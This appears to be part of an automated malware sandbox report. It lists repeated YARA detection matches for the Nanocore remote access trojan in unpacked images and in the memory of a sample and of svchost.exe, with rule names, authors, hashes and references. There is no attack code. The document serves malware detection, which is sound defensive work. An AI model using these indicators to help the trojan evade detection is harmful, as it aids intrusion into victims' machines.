            Source: 10.2.s9SWgUgyO5.exe.7000000.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.7150000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.3.s9SWgUgyO5.exe.48d3cc6.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.71be8a4.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6e30000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.7180000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.71b0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6fc0000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.3.s9SWgUgyO5.exe.48d3cc6.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.2d353fc.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2d353fc.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.3.s9SWgUgyO5.exe.48e82f1.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526053509.0000000006E20000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526069628.0000000006E30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526125965.0000000006FB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.522721839.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.526153225.0000000006FD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.526203306.0000000007000000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000003.486623821.00000000048CB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.526365497.00000000071E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526138671.0000000006FC0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526340220.00000000071B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.526292009.0000000007180000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000A.00000002.522470362.0000000004578000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.71e0000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.71e0000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.71b0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.71b0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.483239e.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.483239e.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.47ae62e.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.47ae62e.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6e20000.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6e20000.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.4648782.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4648782.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.2cbc998.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.2cbc998.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6fb0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6fb0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6000000.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6000000.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6e30000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6e30000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6e20000.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6e20000.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6ff0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6ff0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.3.s9SWgUgyO5.exe.48edd1f.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
